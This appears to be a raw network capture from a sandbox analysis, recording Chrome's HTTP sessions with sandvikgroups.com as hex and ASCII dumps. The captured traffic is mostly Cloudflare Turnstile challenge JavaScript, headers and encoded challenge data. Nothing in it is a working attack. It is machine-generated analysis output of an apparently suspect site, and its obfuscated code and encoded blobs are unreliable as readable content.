                                        2025-01-07 21:05:58 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                        Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                        2025-01-07 21:05:58 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                        Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                        2025-01-07 21:05:58 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                        Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.449754188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:58 UTC416OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443e HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:58 UTC873INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:58 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 101581
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghWlnHeE1CGPb86cZxLYPN3cMRzCjJ3L4%2BCnb4MFTq43m80tIOmnfaeBVNyRSXgEAgPtlL6rQN2Zebkmcrcf6Ai9%2FoyNvzZCYLtP86XWyo517usoZusoEX3SwlPcLd6PC7tPzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8b469bd43eb-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1616&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=994&delivery_rate=1794714&cwnd=183&unsent_bytes=0&cid=181489a91f13a505&ts=165&x=0"
                                        2025-01-07 21:05:58 UTC496INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"}
                                        2025-01-07 21:05:58 UTC1369INData Raw: 74 2e 22 2c 22 66 6f 6f 74 65 72 5f 74 65 78 74 22 3a 22 50 65 72 66 6f 72 6d 61 6e 63 65 25 32 30 25 32 36 61 6d 70 25 33 42 25 32 30 73 65 63 75 72 69 74 79 25 32 30 62 79 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 22 2c 22 6a 73 5f 63 6f 6f 6b 69 65 73 5f 6d 69 73 73 69 6e 67 22 3a 22 45 6e 61 62 6c 65 25 32 30 4a 61 76 61 53 63 72 69 70 74 25 32 30 61 6e 64 25 32 30 63 6f 6f 6b 69 65 73 25 32 30 74 6f 25 32 30 63 6f 6e 74 69 6e 75 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 22 69 6e 74 65 72 61 63 74 69 76 65 5f 72 75 6e 6e 69 6e 67 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 25 32 30 62 79 25 32 30 63 6f 6d 70 6c 65 74 69 6e 67 25 32 30 74 68 65 25 32 30 61 63 74 69 6f 6e 25 32 30 62 65 6c 6f 77 2e 22
                                        Data Ascii: t.","footer_text":"Performance%20%26amp%3B%20security%20by%20Cloudflare","js_cookies_missing":"Enable%20JavaScript%20and%20cookies%20to%20continue%20verification","interactive_running":"Verify%20you%20are%20human%20by%20completing%20the%20action%20below."
                                        2025-01-07 21:05:58 UTC1369INData Raw: 30 74 6f 25 32 30 74 68 65 25 32 30 6e 65 77 65 73 74 25 32 30 76 65 72 73 69 6f 6e 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f
                                        Data Ascii: 0to%20the%20newest%20version.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only_
                                        2025-01-07 21:05:58 UTC1369INData Raw: 25 32 43 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 6d 69 73 6d 61 74 63 68 5f 77 61 72 6e 69 6e 67 22 3a 22 57 65 62 73 69 74 65 25 32 30 69 73 25 32 30 6e 6f 74 25 32 30 61 63 63 65 73 73 69 62 6c 65 25 32 30 76 69 61 25 32 30 74 68 69 73 25 32 30 61 64 64 72 65 73 73 2e 22 2c 22 62 72 6f 77 73 65 72 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 22 3a 22 42 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 32 30 61 6e 64 25 32 30 63 61 6e 6e 6f 74 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 22 74 75 72 6e
                                        Data Ascii: %2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","location_mismatch_warning":"Website%20is%20not%20accessible%20via%20this%20address.","browser_not_supported":"Browser%20is%20unsupported%20and%20cannot%20complete%20verification","turn
                                        2025-01-07 21:05:58 UTC1369INData Raw: 32 30 73 65 63 6f 6e 64 73 2e 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65 4f 2c 65 50
                                        Data Ascii: 20seconds."},"polyfills":{"turnstile_overrun_description":false,"turnstile_feedback_description":false,"turnstile_timeout":false,"feedback_report_output_subtitle":false,"testing_only_always_pass":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,eO,eP
                                        2025-01-07 21:05:58 UTC1369INData Raw: 31 29 5d 28 48 2c 47 5b 67 4c 28 34 34 31 29 5d 29 3b 6f 5b 67 4c 28 35 32 37 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 67 4c 28 35 33 31 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4b 28 36 30 30 29 5d 5b 67 4b 28 37 34 39 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 67 4b 28 34 34 31 29 5d 3b 67 4b 28 34 34 30 29 21 3d 3d 67 4b 28 34 34 30 29 3f 6f 5b 67 4b 28 31 32 31 39 29 5d 28 73 2c 67 2c 68 29 3a 28 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29 2c 6f 5b 67 4b 28 38 38 38 29 5d 28 42 2c 45 29 29 3f 28 46 3d 6f 5b 67 4b 28 37 39 34 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4b 28 38 37 35 29 5d 28 68 5b 44
                                        Data Ascii: 1)](H,G[gL(441)]);o[gL(527)](G[H],G[H+1])?G[gL(531)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[gK(600)][gK(749)](B),C=0;C<x[gK(441)];gK(440)!==gK(440)?o[gK(1219)](s,g,h):(D=x[C],E=eR(g,h,D),o[gK(888)](B,E))?(F=o[gK(794)]('s',E)&&!g[gK(875)](h[D
                                        2025-01-07 21:05:58 UTC1369INData Raw: 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 42 2d 43 7d 7d 2c 6b 5b 67 51 28 32 34 37 29 5d 21 3d 3d 6b 5b 67 51 28 35 37 35 29 5d 29 72 65 74 75 72 6e 27 6f 2e 27 2b 73 3b 65 6c 73 65 7b 69 66 28 32 35 36 3e 61 77 5b 67 51 28 31 31 33 33 29 5d 28 30 29 29 7b 66 6f 72 28 62 48 3d 30 3b 76 5b 67 51 28 32 38 39 29 5d 28 62 49 2c 62 4a 29 3b 62 4c 3c 3c 3d 31 2c 76 5b 67 51 28 39 36 30 29 5d 28 62 4d 2c 62 4e 2d 31 29 3f 28 62 4f 3d 30 2c 62 50 5b 67 51 28 39 31 31 29 5d 28 62 51 28 62 52 29 29 2c 62 53 3d 30 29 3a 62 54 2b 2b 2c 62 4b 2b 2b 29 3b 66 6f 72 28 62 55 3d 62 56 5b 67 51 28 31 31 33 33 29 5d 28 30 29 2c 62 57 3d 30 3b 76 5b 67 51 28 31 31 35 39 29 5d 28 38 2c 62 58 29 3b 62 5a 3d 76 5b 67 51 28 35 36 38 29 5d 28 63 30 3c 3c 31 2c 63 31 26 31 29
                                        Data Ascii: on(B,C){return B-C}},k[gQ(247)]!==k[gQ(575)])return'o.'+s;else{if(256>aw[gQ(1133)](0)){for(bH=0;v[gQ(289)](bI,bJ);bL<<=1,v[gQ(960)](bM,bN-1)?(bO=0,bP[gQ(911)](bQ(bR)),bS=0):bT++,bK++);for(bU=bV[gQ(1133)](0),bW=0;v[gQ(1159)](8,bX);bZ=v[gQ(568)](c0<<1,c1&1)
                                        2025-01-07 21:05:58 UTC1369INData Raw: 2c 27 62 71 7a 51 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 42 73 77 64 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 4f 79 4d 73 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 5a 47 5a 73 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 52 50 41 69 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 4a 4d 49 61 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 6a 74 72 75 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 43 4d 66 53 76 27 3a 66 75
                                        Data Ascii: ,'bqzQE':function(h,i){return h(i)},'Bswdr':function(h,i){return h>i},'OyMsU':function(h,i){return i==h},'ZGZsH':function(h,i){return h(i)},'RPAiv':function(h,i){return h>i},'JMIah':function(h,i){return h===i},'jtruP':function(h,i){return h(i)},'CMfSv':fu
                                        2025-01-07 21:05:58 UTC1369INData Raw: 29 5d 5b 67 55 28 31 30 30 38 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 67 55 28 35 32 31 29 5d 5b 67 55 28 32 38 36 29 5d 5b 67 55 28 31 30 30 38 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 67 55 28 31 32 31 33 29 5d 28 32 35 36 2c 43 5b 67 55 28 31 31 33 33 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 67 55 28 32 31 33 29 5d 28 49 2c 64 5b 67 55 28 34 34 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 55 28 39 31 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 55 28 31 31 33 33 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 4d 26 31 7c 48 3c 3c 31 2c 64 5b 67 55 28 34 39 32 29 5d 28 49 2c 64 5b 67 55 28 34 31 31 29 5d 28
                                        Data Ascii: )][gU(1008)](x,L))C=L;else{if(Object[gU(521)][gU(286)][gU(1008)](B,C)){if(d[gU(1213)](256,C[gU(1133)](0))){for(s=0;s<F;H<<=1,d[gU(213)](I,d[gU(445)](j,1))?(I=0,G[gU(911)](o(H)),H=0):I++,s++);for(M=C[gU(1133)](0),s=0;8>s;H=M&1|H<<1,d[gU(492)](I,d[gU(411)](
                                        2025-01-07 21:05:58 UTC1369INData Raw: 29 5d 29 3b 50 2b 3d 64 5b 67 55 28 39 39 37 29 5d 28 64 5b 67 55 28 38 31 38 29 5d 5b 67 55 28 34 36 36 29 5d 28 64 5b 67 55 28 38 36 31 29 5d 28 64 5b 67 55 28 33 32 35 29 5d 28 6a 5b 64 5b 67 55 28 33 32 35 29 5d 28 51 2c 32 29 5d 2c 64 5b 67 55 28 39 39 37 29 5d 28 64 5b 67 55 28 35 39 31 29 5d 28 38 2c 33 2d 51 25 34 29 2c 34 29 29 2c 31 35 29 29 2c 64 5b 67 55 28 38 31 38 29 5d 5b 67 55 28 34 36 36 29 5d 28 64 5b 67 55 28 33 32 35 29 5d 28 43 5b 51 3e 3e 32 5d 2c 28 33 2d 51 25 34 29 2a 38 29 26 31 35 29 29 2c 51 2b 2b 29 3b 72 65 74 75 72 6e 20 50 7d 44 2d 2d 2c 64 5b 67 55 28 31 31 30 33 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 55 28 32 32 31 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66
                                        Data Ascii: )]);P+=d[gU(997)](d[gU(818)][gU(466)](d[gU(861)](d[gU(325)](j[d[gU(325)](Q,2)],d[gU(997)](d[gU(591)](8,3-Q%4),4)),15)),d[gU(818)][gU(466)](d[gU(325)](C[Q>>2],(3-Q%4)*8)&15)),Q++);return P}D--,d[gU(1103)](0,D)&&(D=Math[gU(221)](2,F),F++),delete B[C]}else f


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449756188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:58 UTC1315OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Content-Length: 3318
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        Content-type: application/x-www-form-urlencoded
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        CF-Challenge: 58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://sandvikgroups.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:58 UTC3318OUTData Raw: 76 5f 38 66 65 36 65 38 61 36 65 38 38 34 34 34 33 65 3d 4d 73 4f 34 7a 34 38 34 53 34 71 34 43 56 68 66 6b 68 64 34 74 44 75 4a 56 47 56 61 6f 25 32 62 4d 4c 68 4d 44 79 68 6f 35 63 6f 66 57 70 68 52 44 70 4a 59 63 67 75 68 79 68 4f 38 44 70 59 6f 77 68 6f 6a 77 45 75 68 6c 63 52 46 68 75 77 44 62 67 63 59 74 44 44 6f 6f 64 34 67 59 68 76 67 34 68 47 47 68 70 24 72 41 68 24 59 4d 61 2b 68 77 34 72 6f 30 56 33 34 56 46 73 34 74 4a 33 59 6b 41 78 70 4d 71 51 70 31 6a 50 4c 33 73 46 6a 2b 42 6a 68 6b 73 75 68 61 79 4f 62 39 63 75 68 62 35 68 74 33 6a 4c 38 56 4a 6d 35 63 6f 4c 30 31 54 33 73 2d 4b 55 73 46 4f 6c 24 68 56 49 68 6f 36 4a 68 74 35 68 6e 34 56 55 4e 6b 79 2d 53 63 6f 33 62 34 56 6b 4e 52 34 68 47 54 67 4a 31 34 52 33 79 63 68 55 7a 67 67 68 44
                                        Data Ascii: v_8fe6e8a6e884443e=MsO4z484S4q4CVhfkhd4tDuJVGVao%2bMLhMDyho5cofWphRDpJYcguhyhO8DpYowhojwEuhlcRFhuwDbgcYtDDood4gYhvg4hGGhp$rAh$YMa+hw4ro0V34VFs4tJ3YkAxpMqQp1jPL3sFj+BjhksuhayOb9cuhb5ht3jL8VJm5coL01T3s-KUsFOl$hVIho6Jht5hn4VUNky-Sco3b4VkNR4hGTgJ14R3ychUzgghD
                                        2025-01-07 21:05:58 UTC860INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:58 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 16028
                                        Connection: close
                                        cf-chl-gen: G11R1izKBpe+JF/hnzGEZNJXcabaAaCBXs95GLn2qLZSm2bYJOnvYq0hoaCV$ecfw7vcJ189BJ6aJ
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BtLtfaCdLFYrSJ0mNHbjYs%2B92SDYC7uGxEU7yq6ZxlnFQ8YesstS8DxVjs97zjHmhoNw8Mnr5kQ%2Bcy%2Bnj3skf5EaM6eWfW7zuqYRP%2BHDrHOFuWDODeIuEsxNhDhc9qGZ9BpR4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8b6fe848cc5-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2051&rtt_var=1468&sent=8&recv=11&lost=0&retrans=0&sent_bytes=2843&recv_bytes=5255&delivery_rate=602434&cwnd=228&unsent_bytes=0&cid=e06e8bb8d484c498&ts=174&x=0"
                                        2025-01-07 21:05:58 UTC509INData Raw: 68 4a 36 79 76 62 75 46 70 38 65 34 69 71 2f 4e 73 61 65 6d 74 4c 6e 54 77 6f 33 53 31 62 79 52 31 74 6e 4f 33 4f 48 64 6f 37 37 61 6f 72 4f 7a 31 72 36 72 32 75 7a 61 37 74 53 39 36 74 65 31 30 76 58 5a 38 73 66 71 75 4f 2b 39 31 50 33 58 2f 41 45 46 42 64 37 53 41 51 33 68 36 4d 34 48 79 51 6b 49 45 4f 2f 75 44 52 4c 6d 47 78 55 4b 37 65 63 64 46 4f 2f 71 49 42 6f 69 37 52 55 63 41 78 6f 5a 35 76 30 4e 4b 51 59 43 36 51 58 70 4b 43 30 7a 46 7a 51 4d 45 53 59 36 2b 54 38 67 4d 78 4d 37 4d 6a 6f 45 45 53 6b 38 51 55 4d 36 51 53 38 42 4b 45 67 7a 48 53 73 79 4b 68 55 50 4a 30 78 4e 4f 7a 4a 64 45 53 67 67 56 68 70 43 46 31 46 55 57 44 4a 6e 5a 46 35 6b 4b 44 64 4c 53 32 52 6c 52 54 35 30 57 45 4a 36 5a 44 4a 35 56 6e 47 41 50 6f 46 50 59 33 70 4f 4f 48 68
                                        Data Ascii: hJ6yvbuFp8e4iq/NsaemtLnTwo3S1byR1tnO3OHdo77aorOz1r6r2uza7tS96te10vXZ8sfquO+91P3X/AEFBd7SAQ3h6M4HyQkIEO/uDRLmGxUK7ecdFO/qIBoi7RUcAxoZ5v0NKQYC6QXpKC0zFzQMESY6+T8gMxM7MjoEESk8QUM6QS8BKEgzHSsyKhUPJ0xNOzJdESggVhpCF1FUWDJnZF5kKDdLS2RlRT50WEJ6ZDJ5VnGAPoFPY3pOOHh
                                        2025-01-07 21:05:58 UTC1369INData Raw: 51 67 62 4a 41 49 6c 48 79 5a 51 52 69 77 38 45 7a 41 31 44 45 38 4f 56 79 67 55 4a 79 56 59 52 7a 4a 4d 56 45 30 32 57 6c 30 35 57 46 68 67 59 6b 4a 72 59 6a 39 41 52 6d 39 75 64 47 45 79 59 31 4e 59 63 55 74 6e 63 57 59 34 53 58 74 6a 59 57 57 47 66 6c 4a 6e 52 46 6c 2b 62 47 56 37 61 31 75 49 61 34 6c 6b 55 6b 36 44 54 6c 52 5a 69 4a 4a 73 58 56 47 5a 6b 58 42 69 6b 36 4f 61 66 58 46 38 66 49 56 38 6f 6e 35 34 66 4b 79 47 66 59 65 57 70 72 43 49 6b 4c 43 6a 69 5a 57 2b 6d 70 52 34 69 37 53 37 67 72 71 77 68 63 72 48 6e 34 57 35 79 4d 69 38 6a 4d 65 6e 76 35 53 4e 71 72 43 6d 79 49 33 58 7a 72 2b 30 34 4b 72 58 31 2b 58 64 31 4a 6e 48 70 74 6a 6f 32 72 57 36 36 73 44 73 34 71 58 7a 37 4c 4c 58 77 63 4c 74 32 63 6e 74 38 4e 6d 36 